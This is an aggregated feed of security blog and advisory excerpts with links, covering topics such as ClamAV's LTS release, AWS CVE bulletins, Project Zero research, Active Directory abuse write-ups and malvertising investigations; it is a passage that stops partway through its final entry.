We are excited to announce that ClamAV 1.4 is now designated as our latest Long-Term Stable (LTS) release. Previously, we planned to announce 1.5 as the next LTS version at the end of 2024. However, unforeseen challenges have delayed the 1.5 release, leading us to choose version 1.4 for long-term support. We apologize for any inconvenience that our delay in the announcement may have caused. The version support dates for ClamAV 1.4 are amended as follows. Key Dates: Initial 1.4 Release Date: August 15, 2024; Patch Versions Continue Until: August 15, 2027; DB Downloads Allowed Until: August 15, 2028. For specific details, please read the ClamAV EOL Policy. Looking ahead, the beta version of ClamAV 1.5 will soon be available for community review. This version will...
http://blog.clamav.net/2025/01/clamav-14-as-next-long-term-stable-lts.html

How extensions trick CWS search
A few months ago I searched for “Norton Password Manager” in Chrome Web Store and got lots of seemingly unrelated results. Not just that, the actual Norton Password Manager was listed last. These search results are still essentially the same today, only that Norton Password Manager moved to the top of the list: I was stumped how Google managed to mess up search results so badly and even posted the following on Mastodon: Interesting. When I search for “Norton Password Manager” on Chrome Web Store, it first lists five completely unrelated extensions, and only the last search result is the actual Norton Password Manager. Somebody told me that website is run by a company specializing in search, so this shouldn't be due to incompetence, right? What is it then? Somebody suggested that...
https://palant.info/2025/01/08/how-extensions-trick-cws-search/

Beyond the Hype: How to Set Up Your AI Project for Real Success

https://www.proofpoint.com/us/newsroom/news/beyond-hype-how-set-your-ai-project-real-success

1-15 October 2024 Cyber Attacks Timeline
In the first timeline of October 2024, I collected 120 events (8 events/day) with a threat landscape...
https://www.hackmageddon.com/2025/01/07/1-15-october-2024-cyber-attacks-timeline/

Digital transformation 2025: What's in, what's out

https://www.proofpoint.com/us/newsroom/news/digital-transformation-2025-whats-whats-out

Malware metamorphosis: 2024 reflections and 2025 predictions.

https://www.proofpoint.com/us/newsroom/news/malware-metamorphosis-2024-reflections-and-2025-predictions

What Boards Need To Know On Digital And Cybersecurity Governance In 2025

https://www.proofpoint.com/us/newsroom/news/what-boards-need-know-digital-and-cybersecurity-governance-2025

A Fun Chat With Patrick Miller
Happy Saturday, all! I hope you’re having a lovely weekend. This week, I had a fun chat with a long time friend and colleague, Ampyx‘s Patrick Miller. We talked about one of my favorite tech topics – digital forensics in the weird and wacky world of critical infrastructure – where it’s growing, where it’s struggling, […]
https://tisiphone.net/2025/01/04/a-fun-chat-with-patrick-miller/

Active Directory Pentesting Using Netexec Tool: A Complete Guide
Active Directory (AD) penetration testing is an essential part of the security assessment of enterprise networks. The Netexec tool offers a wide range of capabilities The post Active Directory Pentesting Using Netexec Tool: A Complete Guide appeared first on Hacking Articles.
https://www.hackingarticles.in/active-directory-pentesting-using-netexec-tool-a-complete-guide/

Issue with RedShift JDBC Driver, Python Connector and ODBC Driver - (CVE-2024-12744, CVE-2024-12745, CVE-2024-12746)
Publication Date: 2024/12/24 10:00AM PST AWS has identified the following issues within the Amazon Redshift JDBC Driver, Amazon Redshift Python Connector, and Amazon Redshift ODBC Driver. On December 23, 2024, we released a fix and recommend customers upgrade to the latest version to address these issues. The Amazon Redshift JDBC Driver, version 2.1.0.31, is affected by CVE-2024-12744, a SQL injection issue when utilizing the getSchemas, getTables, or getColumns Metadata APIs. This issue has been addressed in driver version 2.1.0.32. We recommend customers upgrade to the driver version 2.1.0.32 or revert to driver version 2.1.0.30. The Amazon Redshift Python Connector, version 2.1.4, is affected by CVE-2024-12745, a SQL injection issue when utilizing the get_schemas, get_tables, or...
https://aws.amazon.com/security/security-bulletins/AWS-2024-015/

Announcing CodeQL Community Packs
We are excited to introduce the new CodeQL Community Packs, a comprehensive set of queries and models designed to enhance your code analysis capabilities. These packs are tailored to augment… The post Announcing CodeQL Community Packs appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/announcing-codeql-community-packs/

Q3 2024 Cyber Attacks Statistics
I aggregated the statistics created from the cyber attacks timelines published in the third quarter of 2024. In this period, I collected...
https://www.hackmageddon.com/2024/12/23/q3-2024-cyber-attacks-statistics/

The Windows Registry Adventure #5: The regf file format
Posted by Mateusz Jurczyk, Google Project Zero As previously mentioned in the second installment of the blog post series ("A brief history of the feature"), the binary format used to encode registry hives from Windows NT 3.1 up to the modern Windows 11 is called regf. In a way, it is quite special, because it represents a registry subtree simultaneously on disk and in memory, as opposed to most other common file formats. Documents, images, videos, etc. are generally designed to store data efficiently on disk, and they are subsequently parsed to and from different in-memory representations whenever they are read or written. This seems only natural, as offline storage and RAM come with different constraints and requirements. On disk, it is important that the data is packed as...
https://googleprojectzero.blogspot.com/2024/12/the-windows-registry-adventure-5-regf.html

NIST's International Cybersecurity and Privacy Engagement Update – New Translations
As the year comes to a close, NIST continues to engage with our international partners to strengthen cybersecurity, including sharing over ten new international translations in over six languages as resources for our stakeholders around the world. These efforts were complemented by discussions on opportunities for future enhanced international collaboration and resource sharing. Here are some updates from the past few months: Our international engagement continues through our support to the Department of State and the International Trade Administration (ITA) during numerous international
https://www.nist.gov/blogs/cybersecurity-insights/nists-international-cybersecurity-and-privacy-engagement-update-new

September 2024 Cyber Attacks Statistics
After the corresponding cyber attacks timelines, it's time to publish the statistics for September 2024 where I collected and analyzed 257 events. During September 2024...
https://www.hackmageddon.com/2024/12/19/september-2024-cyber-attacks-statistics/

The Biggest Data Breaches of 2024
Similarly to what I have done in the past few years, I am collecting the main mega breaches (that is, breaches with more than one million records stolen by the attackers and possibly leaked).
https://www.hackmageddon.com/2024/12/18/the-biggest-data-breaches-of-2024/

Uncovering GStreamer secrets
In this post, I'll walk you through the vulnerabilities I uncovered in the GStreamer library and how I built a custom fuzzing generator to target MP4 files. The post Uncovering GStreamer secrets appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/uncovering-gstreamer-secrets/

16-30 September 2024 Cyber Attacks Timeline
In the second timeline of September 2024 I collected 130 events (8.67 events/day) with a threat landscape...
https://www.hackmageddon.com/2024/12/17/16-30-september-2024-cyber-attacks-timeline/

2025 Cybersecurity Predictions
“I never think of the future. It comes soon enough.”
https://www.f5.com/labs/articles/cisotociso/2025-cybersecurity-predictions

A Nifty Initial Access Payload
Red Teaming engagements are “realistic” attack simulations designed to test the security posture of an organization and its Blue Team. This term is used in many different ways, so if you’re not sure where to draw the line, Michael Schneier’s latest blog post provides a good comparison of different types of assessment. Anyway, when doing […]
https://blog.compass-security.com/2024/12/a-nifty-initial-access-payload/

The Qualcomm DSP Driver - Unexpectedly Excavating an Exploit
Posted by Seth Jenkins, Google Project Zero. This blog post provides a technical analysis of exploit artifacts provided to us by Google's Threat Analysis Group (TAG) from Amnesty International. Amnesty's report on these exploits is available here. Thanks to both Amnesty International and Google's Threat Analysis Group for providing the artifacts and collaborating on the subsequent technical analysis! Introduction: Earlier this year, Google's TAG received some kernel panic logs generated by an In-the-Wild (ITW) exploit. Those logs kicked off a bug hunt that led to the discovery of 6 vulnerabilities in one Qualcomm driver over the course of 2.5 months, including one issue that TAG reported as ITW. This blog post covers the details of the original artifacts, each of the bugs discovered,...
https://googleprojectzero.blogspot.com/2024/12/qualcomm-dsp-driver-unexpectedly-excavating-exploit.html

Dirty DAG - Azure Apache Airflow Integration Vulnerabilities
Unit 42 researchers identified vulnerabilities in the Azure Data Factory's integration with Apache Airflow. These vulnerabilities include misconfigured Kubernetes Role-Based Access Control (RBAC), improper secret handling in Azure's internal Geneva service, and weak authentication mechanisms. Exploiting these flaws, attackers could gain shadow admin control over Azure infrastructure by crafting malicious DAG files or compromising service principals, leading to unauthorized access, data exfiltration, malware deployment, and persistent control of the cluster. Once attackers gain access, they can escalate privileges within the Azure Kubernetes Service (AKS) cluster, compromise containerized environments, and exploit Azure's Geneva service to manipulate logs and metrics. The research highlighted...
https://www.cloudvulndb.org/azure-airflow-vulnerabilities

Ways to Mitigate Risk in Cybersecurity: Cybersecurity Risk Management
Cyber threats can wreak havoc on businesses, from data breaches to loss of reputation. Luckily, there are effective strategies available that can reduce cybersecurity risk. Avoidance is one of the... The post Ways to Mitigate Risk in Cybersecurity: Cybersecurity Risk Management appeared first on Hacker Combat.
https://www.hackercombat.com/cybersecurity-risk-management/

Windows Tooling Updates: OleView.NET
Posted by James Forshaw, Google Project Zero. This is a short blog post about some recent improvements I've been making to the OleView.NET tool which has been released as part of version 1.16. The tool is designed to discover the attack surface of Windows COM and find security vulnerabilities such as privilege escalation and remote code execution. The updates were recently presented at the Microsoft Bluehat conference in Redmond under the name "DCOM Research for Everyone!". This blog expands on the topics discussed to give a bit more background and detail that couldn't be fit within the 45-minute timeslot. This post assumes a knowledge of COM as I'm only going to describe a limited number of terms. Using the OleView.NET Tooling: Before we start the discussion it's important...
https://googleprojectzero.blogspot.com/2024/12/windows-tooling-updates-oleviewnet.html

Issue with DynamoDB local - CVE-2022-1471
Publication Date: 2024/12/11 2:00PM PST. AWS is aware of CVE-2022-1471 in SnakeYaml software, included in DynamoDB local jar and Docker distributions from version 1.21 and version 2.0. If leveraged, this issue could allow an actor to perform remote code execution using SnakeYaml's Constructor(), as the software does not restrict the types that can be instantiated during deserialization. AWS has found no evidence that this issue has been leveraged; however, customers should still take action. On November 6, 2024, we released a fix for this issue. Customers should upgrade DynamoDB local to the latest version: v1.25.1 and above, or 2.5.3 and above. Please email aws-security@amazon.com with any security questions or concerns.
https://aws.amazon.com/security/security-bulletins/AWS-2024-014/

CodeQL zero to hero part 4: Gradio framework case study
Learn how I discovered 11 new vulnerabilities by writing CodeQL models for Gradio framework and how you can do it, too. The post CodeQL zero to hero part 4: Gradio framework case study appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/codeql-zero-to-hero-part-4-gradio-framework-case-study/

Abusing AD-DACL: WriteOwner
In this post, we will explore the exploitation of Discretionary Access Control Lists (DACL) using the WriteOwner permission in Active Directory environments. The WriteOwner permission The post Abusing AD-DACL: WriteOwner appeared first on Hacking Articles.
https://www.hackingarticles.in/abusing-ad-dacl-writeowner/

Google Cloud expands vulnerability detection for Artifact Registry using OSV
Posted by Greg Mucci, Product Manager, Artifact Analysis, Oliver Chang, Senior Staff Engineering, OSV, and Charl de Nysschen, Product Manager, OSV. DevOps teams dedicated to securing their supply chain and predicting potential risks consistently face novel threats. Fortunately, they can now improve their image and container security by harnessing Google-grade vulnerability scanning, which offers expanded open-source coverage. A significant benefit of utilizing Google Cloud Platform is its integrated security tools, including Artifact Analysis. This scanning service leverages the same infrastructure that Google depends on to monitor vulnerabilities within its internal systems and software supply chains. Artifact Analysis has recently expanded its scanning coverage to eight additional language packages,...
http://security.googleblog.com/2024/12/google-cloud-expands-vulnerability.html

Scanning For Credentials, and BotPoke Changes IPs Again
Nearly 50% of observed traffic is looking for accidentally exposed data.
https://www.f5.com/labs/articles/threat-intelligence/scanning-for-credentials-and-botpoke-changes-ips-again

Announcing the launch of Vanir: Open-source Security Patch Validation
Posted by Hyunwook Baek, Duy Truong, Justin Dunlap and Lauren Stan from Android Security and Privacy, and Oliver Chang with the Google Open Source Security Team. Today, we are announcing the availability of Vanir, a new open-source security patch validation tool. Introduced at Android Bootcamp in April, Vanir gives Android platform developers the power to quickly and efficiently scan their custom platform code for missing security patches and identify applicable available patches. Vanir significantly accelerates patch validation by automating this process, allowing OEMs to ensure devices are protected with critical security updates much faster than traditional methods. This strengthens the security of the Android ecosystem, helping to keep Android users around the world safe. By open-sourcing...
http://security.googleblog.com/2024/12/announcing-launch-of-vanir-open-source.html

Data Pipeline Challenges of Privacy-Preserving Federated Learning
This post is part of a series on privacy-preserving federated learning. The series is a collaboration between NIST and the UK government's Responsible Technology Adoption Unit (RTA), previously known as the Centre for Data Ethics and Innovation. Learn more and read all the posts published to date at NIST's Privacy Engineering Collaboration Space or RTA's blog. Introduction: In this post, we talk with Dr. Xiaowei Huang and Dr. Yi Dong (University of Liverpool) and Sikha Pentyala (University of Washington Tacoma), who were winners in the UK-US PETs Prize Challenges. We discuss real-world data
https://www.nist.gov/blogs/cybersecurity-insights/data-pipeline-challenges-privacy-preserving-federated-learning

Abusing AD-DACL: WriteDacl
In this post, we will explore the exploitation of Discretionary Access Control Lists (DACL) using the WriteDacl permission in Active Directory environments. Attackers can abuse The post Abusing AD-DACL: WriteDacl appeared first on Hacking Articles.
https://www.hackingarticles.in/abusing-ad-dacl-writedacl/

Predictions 2025: The Future of Cybersecurity Unveiled
The digital world is evolving at breakneck speed. In 2025, we're set to witness transformative changes in cybersecurity that will redefine trust, security, and how we navigate our digital lives. Here's what we see coming: Read the full blog to explore the trends in depth. The future of cybersecurity will demand both solutions and vigilance. […] The post Predictions 2025: The Future of Cybersecurity Unveiled appeared first on Avast Threat Labs.
https://decoded.avast.io/threatintel/predictions-2025-the-future-of-cybersecurity-unveiled/?utm_source=rss&utm_medium=rss&utm_campaign=predictions-2025-the-future-of-cybersecurity-unveiled

My Upcoming SANS Classes!
I will be teaching two SANS ICS515 classes at upcoming events. You can attend in person or virtually at: San Francisco (Live and Online) Jan 27: https://www.sans.org/cyber-security-courses/ics-visibility-detection-response/ Dallas, TX (Live and Online) Mar 24: https://www.sans.org/cyber-security-courses/ics-visibility-detection-response/
https://tisiphone.net/2024/12/03/my-upcoming-sans-classes/

Some of my favorite podcast appearances in 2024
And, without further ado, here are some of the fun, smart people I have gotten to speak to on podcasts this year! Yes, blog aside, I’ve been busy! Cyber Uncut: Making your ICS/OT environments cyber secure, with Dragos' Lesley Carhart Cyber Security Weekly Podcast: Episode 413 – Operational Technology (OT) Cybersecurity – Episode 4 Breaking […]
https://tisiphone.net/2024/12/03/some-of-my-favorite-podcast-appearances-in-2024/

Some of my favorite talks in 2024
Hello, I understand I have been terribly delinquent in posting, so I wanted to share in the interim, some of my favorite talks of the past year. I hope you enjoy, and look forward to seeing you soon! I spoke to DomainTools about the current state of Industrial Cybersecurity and what I’m seeing in the […]
https://tisiphone.net/2024/12/03/some-of-my-favorite-talks-in-2024/

Harvesting GitLab Pipeline Secrets
TLDR: Scan GitLab job logs for credentials using https://github.com/CompassSecurity/pipeleak Many organizations use (self-hosted) GitLab instances to manage their source code and a lot of infrastructure is managed in code (IaC), thus these configurations must be source-controlled as well, putting a lot of responsibility on the source code platform in use. Often deployments are automated using CI/CD […]
https://blog.compass-security.com/2024/12/harvesting-gitlab-pipeline-secrets/

Zero Trust Architecture
Zero trust security takes a “never trust, always verify” approach to access control. Access is only granted once an individual’s identity and context have been confirmed through multifactor authentication and... The post Zero Trust Architecture appeared first on Hacker Combat.
https://www.hackercombat.com/zero-trust-architecture/

What Is a Security Operations Center (SOC)?
A Security Operations Center (SOC) specializes in monitoring and analyzing data to detect cyber threats and prevent attacks from them. They work to sort actual threats from false positives before... The post What Is a Security Operations Center (SOC)? appeared first on Hacker Combat.
https://www.hackercombat.com/soc/

XDR vs SIEM Security Information and Event Management
The Extended Detection and Response Platform (XDR) ingestion and correlation technology captures and correlates high-fidelity data across your security layers, such as endpoint, network, logs, cloud services and identities to... The post XDR vs SIEM Security Information and Event Management appeared first on Hacker Combat.
https://www.hackercombat.com/xdr-vs-siem/

Best Free EDR for Windows PC
Endpoint detection and response (EDR) tools offer businesses that employ hybrid work models or remote employees an extra layer of cybersecurity protection. Utilizing artificial intelligence (AI) and machine learning (ML),... The post Best Free EDR for Windows PC appeared first on Hacker Combat.
https://www.hackercombat.com/best-free-edr-tools-for-windows-pc/

Abusing AD-DACL: GenericWrite
In this post, we will explore the exploitation of Discretionary Access Control Lists (DACL) using the GenericWrite permission in Active Directory environments. This permission can The post Abusing AD-DACL: GenericWrite appeared first on Hacking Articles.
https://www.hackingarticles.in/abusing-ad-dacl-genericwrite/

Free EDR Solutions for Home Users in 2025
EDR can detect and respond to emerging and advanced cyber threats quickly and efficiently, making it an essential component of modern business ecosystems. Beyond signature-based detection capabilities, its features go... The post Free EDR Solutions for Home Users in 2025 appeared first on Hacker Combat.
https://www.hackercombat.com/free-edr-solutions/

BotPoke Scanner Switches IP
Our top talker changes up their infrastructure, and CVE-2023-1389 continues to hold the top spot.
https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip

Simple macOS kernel extension fuzzing in userspace with IDA and TinyInst
Posted by Ivan Fratric, Google Project Zero Recently, one of the projects I was involved in had to do with video decoding on Apple platforms, specifically AV1 decoding. On Apple devices that support AV1 video format (starting from Apple A17 iOS / M3 macOS), decoding is done in hardware. However, despite this, during decoding, a large part of the AV1 format parsing happens in software, inside the kernel, more specifically inside the AppleAVD kernel extension (or at least, that used to be the case in macOS 14/ iOS 17). As fuzzing is one of the techniques we employ regularly, the question of how to effectively fuzz this code inevitably came up. It should be noted that I wasn’t the first person to look into the problem of Apple kernel extension fuzzing, so before going...
https://googleprojectzero.blogspot.com/2024/11/simple-macos-kernel-extension-fuzzing.html

A Look Back: Insights from Our Managed Bug Bounty Program
At Compass Security, we are proud to offer a fully managed bug bounty program tailored to the needs of both SMEs and larger enterprises. From scoping to payout, we manage every aspect of the process to ensure a seamless experience for our customers and valued hunters. In this blog post, we'll take a look at our journey since the launch of our service in October 2023, highlighting key milestones, metrics and learnings gathered along the way.
https://blog.compass-security.com/2024/11/a-look-back-insights-from-our-managed-bug-bounty-program/

Black Friday Versus The Bots
What can last year’s Black Friday shopping trends teach us about expected attacker behavior during the 2024 holiday shopping season?
https://www.f5.com/labs/articles/threat-intelligence/black-friday-versus-the-bots

Kicking-Off with a December 4th Workshop, NIST is Revisiting and Revising Foundational Cybersecurity Activities for IoT Device Manufacturers, NIST IR 8259!
In May 2020, NIST published Foundational Cybersecurity Activities for IoT Device Manufacturers (NIST IR 8259), which describes recommended cybersecurity activities that manufacturers should consider performing before their IoT devices are sold to customers. These foundational cybersecurity activities can help manufacturers lessen the cybersecurity-related efforts needed by customers, which in turn can reduce the prevalence and severity of IoT device compromises and the attacks performed using compromised devices. In the nearly five years since this document was released, it has been published
https://www.nist.gov/blogs/cybersecurity-insights/kicking-december-4th-workshop-nist-revisiting-and-revising-foundational

Leveling Up Fuzzing: Finding more vulnerabilities with AI
Posted by Oliver Chang, Dongge Liu and Jonathan Metzman, Google Open Source Security Team. Recently, OSS-Fuzz reported 26 new vulnerabilities to open source project maintainers, including one vulnerability in the critical OpenSSL library (CVE-2024-9143) that underpins much of internet infrastructure. The reports themselves aren't unusual—we've reported and helped maintainers fix over 11,000 vulnerabilities in the 8 years of the project. But these particular vulnerabilities represent a milestone for automated vulnerability finding: each was found with AI, using AI-generated and enhanced fuzz targets. The OpenSSL CVE is one of the first vulnerabilities in a critical piece of software that was discovered by LLMs, adding another real-world example to a recent Google discovery of an exploitable...
http://security.googleblog.com/2024/11/leveling-up-fuzzing-finding-more.html

Gen Q3/2024 Threat Report
The third quarter threat report is here—and it's packed with answers. Our Threat Labs team had uncovered some heavy stories behind the stats, exposing the relentless tactics shaping today's threat landscape. Here's what you need to know: This is just the surface. Read the full report and see how our Threat Labs team is relentlessly […] The post Gen Q3/2024 Threat Report appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/gen-q3-2024-threat-report/?utm_source=rss&utm_medium=rss&utm_campaign=gen-q3-2024-threat-report

Inside Bitdefender Labs' Investigation of a Malicious Facebook Ad Campaign Targeting Bitwarden Users
Throughout 2024, Bitdefender Labs has been closely monitoring a series of malvertising campaigns that exploit popular platforms to spread malware. These campaigns use fake advertisements to lure users into installing malicious software disguised as legitimate apps or updates. One of the more recent campaigns Bitdefender Labs uncovered involves a fake Bitwarden extension advertised on Meta's social media platform Facebook. The campaign tricks users into installing a harmful browser extension und
https://www.bitdefender.com/en-us/blog/labs/inside-bitdefender-labs-investigation-of-a-malicious-facebook-ad-campaign-targeting-bitwarden-users

Unlocking Cybersecurity Talent: The Power of Apprenticeships
Cybersecurity is a fast-growing field, with a constant need for skilled professionals. But unlike other professions — like medicine or aviation — there's no clear-cut pathway to qualifying for cybersecurity positions. For employers and job seekers alike, this can make the journey to building a team (or entering a successful cybersecurity career) feel uncertain. Enter the registered apprenticeship program — a proven method for developing skilled talent in cybersecurity that benefits both the employer and the new professional. Let's commit to supporting this important talent development approach
https://www.nist.gov/blogs/cybersecurity-insights/unlocking-cybersecurity-talent-power-apprenticeships

Retrofitting spatial safety to hundreds of millions of lines of C++
Posted by Alex Rebert and Max Shavrick, Security Foundations, and Kinuko Yasuda, Core Developer. Attackers regularly exploit spatial memory safety vulnerabilities, which occur when code accesses a memory allocation outside of its intended bounds, to compromise systems and sensitive data. These vulnerabilities represent a major security risk to users. Based on an analysis of in-the-wild exploits tracked by Google's Project Zero, spatial safety vulnerabilities represent 40% of in-the-wild memory safety exploits over the past decade (figure: Breakdown of memory safety CVEs exploited in the wild by vulnerability class). Google is taking a comprehensive approach to memory safety. A key element of our strategy focuses on Safe Coding and using memory-safe languages in new code. This leads...
http://security.googleblog.com/2024/11/retrofitting-spatial-safety-to-hundreds.html

Safer with Google: New intelligent, real-time protections on Android to keep you safe
Posted by Lyubov Farafonova, Product Manager and Steve Kafka, Group Product Manager, Android. User safety is at the heart of everything we do at Google. Our mission to make technology helpful for everyone means building features that protect you while keeping your privacy top of mind. From Gmail's defenses that stop more than 99.9% of spam, phishing and malware, to Google Messages' advanced security that protects users from 2 billion suspicious messages a month and beyond, we're constantly developing and expanding protection features that help keep you safe. We're introducing two new real-time protection features that enhance your safety, all while safeguarding your privacy: Scam Detection in Phone by Google to protect you from scams and fraud, and Google Play Protect live threat detection...
http://security.googleblog.com/2024/11/new-real-time-protections-on-Android.html

Digital Identities: Getting to Know the Verifiable Digital Credential Ecosystem
If you are interested in the world of digital identities, you have probably heard some of the buzzwords that have been floating around for a few years now… “verifiable credential,” “digital wallet,” “mobile driver's license” or “mDL.” These terms, among others, all reference a growing ecosystem around what we are calling “verifiable digital credentials.” But what exactly is a verifiable digital credential? Take any physical credential you use in everyday life – your driver's license, your medical insurance card, a certification or diploma – and turn it into a digital format stored on your
https://www.nist.gov/blogs/cybersecurity-insights/digital-identities-getting-know-verifiable-digital-credential-ecosystem

Issue with data.all (Multiple CVEs)
Publication Date: 2024/11/8 4:00 PM PDT. Data.all is an open source development framework to help customers build a data marketplace on AWS. We have identified the following issues within data.all version 1.0.0 through 2.6.0. On November 8, 2024, we released a fix and recommend customers upgrade to version 2.6.1 or later and ensure any forked or derivative code is patched to incorporate the new fixes. CVE-2024-52311 relates to an issue where data.all does not invalidate the authentication token upon user logout. CVE-2024-52312 relates to an issue where data.all authenticated users can perform restricted operations against DataSets and Environments. CVE-2024-52313 relates to an issue where data.all authenticated users can obtain incorrect object level authorizations. CVE-2024-52314...
https://aws.amazon.com/security/security-bulletins/AWS-2024-013/

From Naptime to Big Sleep: Using Large Language Models To Catch Vulnerabilities In Real-World Code
Posted by the Big Sleep team. Introduction: In our previous post, Project Naptime: Evaluating Offensive Security Capabilities of Large Language Models, we introduced our framework for large-language-model-assisted vulnerability research and demonstrated its potential by improving the state-of-the-art performance on Meta's CyberSecEval2 benchmarks. Since then, Naptime has evolved into Big Sleep, a collaboration between Google Project Zero and Google DeepMind. Today, we're excited to share the first real-world vulnerability discovered by the Big Sleep agent: an exploitable stack buffer underflow in SQLite, a widely used open source database engine. We discovered the vulnerability and reported it to the developers in early October, who fixed it on the same day. Fortunately, we found...
https://googleprojectzero.blogspot.com/2024/10/from-naptime-to-big-sleep.html

Repo swatting attack deletes/blocks GitHub and GitLab accounts
A technique called "repo swatting" allows attackers to delete GitHub and block GitLab accounts by exploiting file upload features and abuse reporting mechanisms. Attackers upload malicious files to a target's repository, then report the account for hosting malicious content, potentially resulting in account deletion. The vulnerability was partially mitigated by October 2024 via changes in upload URL paths and a requirement for each uploader to be authenticated (in GitHub).
https://www.cloudvulndb.org/repo-swatting-attack-deletes-github-gitlab-accounts

The Karma connection in Chrome Web Store
Somebody brought to my attention that the Hide YouTube Shorts extension for Chrome changed hands and turned malicious. I looked into it and could confirm that it contained two undisclosed components: one performing affiliate fraud and the other sending users' every move to some Amazon cloud server. But that wasn't all of it: I discovered eleven more extensions written by the same people. Some contained only the affiliate fraud component, some only the user tracking, some both. A few don't appear to be malicious yet. While most of these extensions were supposedly developed or bought by a person without any other traces online, one broke this pattern. Karma shopping assistant has been on Chrome Web Store since 2020, the company behind it founded in 2013. This company employs more than...
https://palant.info/2024/10/30/the-karma-connection-in-chrome-web-store/

Unmasking the SYS01 Infostealer Threat: Bitdefender Labs Tracks Global Malvertising Campaign Targeting Meta Business Pages
In a world run by advertising, businesses and organizations are not the only ones using this powerful tool. Cybercriminals have a knack for exploiting the engine that powers online platforms by corrupting the vast reach of advertising to distribute malware en masse. While legitimate businesses rely on ads to reach new audiences, hackers exploit these platforms to trick users into downloading harmful software. Malicious ads often seem to promote legitimate software, streaming services, or produc
https://www.bitdefender.com/en-us/blog/labs/unmasking-the-sys01-infostealer-threat-bitdefender-labs-tracks-global-malvertising-campaign-targeting-meta-business-pages

Email, Email on the Wall, Who Sent You, After All?
During Business Email Compromise (BEC) engagements we often have to analyze the provenance of emails. According to the FBI's Internet Crime Report, BEC is one of the most financially damaging attacks, even surpassing ransomware in terms of losses. But how can we know all of this? Through email headers! This blog post tries to shed some light on the information contained within emails, what it means, and what can be done to prevent this type of attack.
https://blog.compass-security.com/2024/10/email-email-on-the-wall-who-sent-you-after-all/

Staff Stories Spotlight Series: Cybersecurity Awareness Month 2024
This blog is part of a larger NIST series during the month of October for Cybersecurity Awareness Month, called 'Staff Stories Spotlight.' Throughout the month of October this year, Q&A style blogs will be published featuring some of our unique staff members who have interesting backgrounds, stories to tell, and projects in the world of cybersecurity. This year's Cybersecurity Awareness Month theme is 'Secure our World.' How does this theme resonate with you, as someone working in cybersecurity? Now more than ever, the use of technology is central to our lives. It is the means by which we are
https://www.nist.gov/blogs/cybersecurity-insights/staff-stories-spotlight-series-cybersecurity-awareness-month-2024-1

Cloud Security Essentials
Cloud security involves employing perimeter defenses like firewalls, IDPSs and VPNs as well as guaranteeing isolation through network segmentation and virtual LANs while monitoring traffic for anomalies and threats –... The post Cloud Security Essentials appeared first on Hacker Combat.
https://www.hackercombat.com/cloud-security/

Antivirus Software
Antivirus software protects devices against viruses, malware, and other cyberthreats by detecting, quarantining, and deleting malicious code. Modern antivirus products also offer additional security features such as password protection, identity... The post Antivirus Software appeared first on Hacker Combat.
https://www.hackercombat.com/antivirus-software/

Three Ways AI Can Hack the U.S. Election
The growing capability of AI content poses three very real threats to modern elections. We explain each, and take a glimpse at a possible solution to the growing AIpocalypse.
https://www.f5.com/labs/articles/cisotociso/three-ways-ai-can-hack-the-us-election

The Windows Registry Adventure #4: Hives and the registry layout
Posted by Mateusz Jurczyk, Google Project Zero To a normal user or even a Win32 application developer, the registry layout may seem simple: there are five root keys that we know from Regedit (abbreviated as HKCR, HKLM, HKCU, HKU and HKCC), and each of them contains a nested tree structure that serves a specific role in the system. But as one tries to dig deeper and understand how the registry really works internally, things may get confusing really fast. What are hives? How do they map or relate to the top-level keys? Why are some HKEY root keys pointing inside of other root keys (e.g. HKCU being located under HKU)? These are all valid questions, but they are difficult to answer without fully understanding the interactions between the user-mode Registry API and the kernel-mode registry...
https://googleprojectzero.blogspot.com/2024/10/the-windows-registry-adventure-4-hives.html

How to Protect Against Ransomware Attacks?
Criminal hackers employ ransomware attacks against their targets by encrypting their data and demanding that a ransom be paid within an allotted timeframe or risk losing it forever. When an... The post How to Protect Against Ransomware Attacks? appeared first on Hacker Combat.
https://www.hackercombat.com/protect-against-ransomware-attacks/

AWS CDK Bucket Squatting Risk
The AWS Cloud Development Kit (CDK) is a way of deploying infrastructure-as-code. The vulnerability involves AWS CDK's use of a predictable S3 bucket name format (cdk-{Qualifier}-assets-{Account-ID}-{Region}), where the default “random” qualifier (hnb659fds) is common and easily guessed. If an AWS customer deletes this bucket and reuses CDK, an attacker who claims the bucket can inject malicious CloudFormation templates, potentially gaining admin access. Attackers supposedly only need the AWS account ID to prepare the bucket in various regions, exploiting the default naming convention. However, it is important to note that the additional conditions greatly lower the likelihood of exploitation. The victim must use the CDK, having deleted the bucket, and then subsequently attempt to...
https://www.cloudvulndb.org/aws-cdk-squatting

IoT Assignment Completed! Report on Barriers to U.S. IoT Adoption
The 16 members of the NIST-managed Internet of Things (IoT) Advisory Board have completed their report on barriers to the U.S. receiving the benefits of IoT adoption, along with their recommendations for overcoming those barriers. As Benson Chan (Chair) and Dan Caprio (Vice Chair) of the IoT Advisory Board state in the report: “The United States is in the early stages of a profound transformation, one that is driven by economic, societal, and cultural innovations brought about by the IoT. These innovations intertwine connectivity and digital innovation with the opportunity to drive a
https://www.nist.gov/blogs/cybersecurity-insights/iot-assignment-completed-report-barriers-us-iot-adoption

CVE-2024-8901 - missing JWT issuer and signer validation in aws-alb-route-directive-adapter-for-istio
Publication Date: 2024/10/21 4:00 PM PDT The AWS ALB Route Directive Adapter For Istio repo provides an OIDC authentication mechanism that was integrated into the open source Kubeflow project. The adapter uses JWT for authentication, but lacks proper signer and issuer validation. In deployments of ALB that ignore security best practices, where ALB targets are directly exposed to internet traffic, an actor can provide a JWT signed by an untrusted entity in order to spoof OIDC-federated sessions and successfully bypass authentication. Affected versions: v1.0, v1.1 Resolution The repository/package has been deprecated, is End of Life, and is no longer actively supported. Workarounds As a security best practice, ensure that your ELB targets (e.g. EC2 Instances, Fargate...
https://aws.amazon.com/security/security-bulletins/AWS-2024-011/

CVE-2024-10125 - missing JWT issuer and signer validation in aws-alb-identity-aspnetcore
